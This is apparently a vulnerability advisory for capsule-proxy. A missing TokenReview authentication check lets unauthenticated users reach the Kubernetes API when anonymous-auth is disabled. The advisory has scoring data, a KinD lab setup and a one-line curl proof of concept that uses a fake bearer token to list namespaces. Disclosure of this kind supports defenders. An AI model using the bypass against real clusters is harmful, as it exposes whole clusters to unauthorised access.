CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
26.2%
The privilege escalation is based on a missing check if the user is authenticated based on the TokenReview
result.
All the clusters running with the anonymous-auth
Kubernetes API Server setting disable (set to false
) are affected since it would be possible to bypass the token review mechanism, interacting with the upper Kubernetes API Server.
Start a KinD cluster with the anonymous-auth
value to false
.
If it is true, it uses anonymous permissions which are very limited by default
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
kubeadmConfigPatches:
- |
kind: ClusterConfiguration
apiServer:
extraArgs:
anonymous-auth: "false"
Install capsule
and capsule-proxy
k port-forward svc/capsule-proxy 9001
Forwarding from 127.0.0.1:9001 -> 9001
Forwarding from [::1]:9001 -> 9001
Handling connection for 9001
Then query the proxy
curl -g -k -H 'Authorization: Bearer f' -X 'GET' 'https://localhost:9001/api/v1/namespaces'
The whole cluster is exposed to unauthorised users.
This privilege escalation cannot be exploited if you’re relying only on client certificates (SSL/TLS).
Vendor | Product | Version | CPE |
---|---|---|---|
clastix | capsule-proxy | * | cpe:2.3:a:clastix:capsule-proxy:*:*:*:*:*:*:*:* |
projectcapsule | capsule | * | cpe:2.3:a:projectcapsule:capsule:*:*:*:*:*:*:*:* |
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
26.2%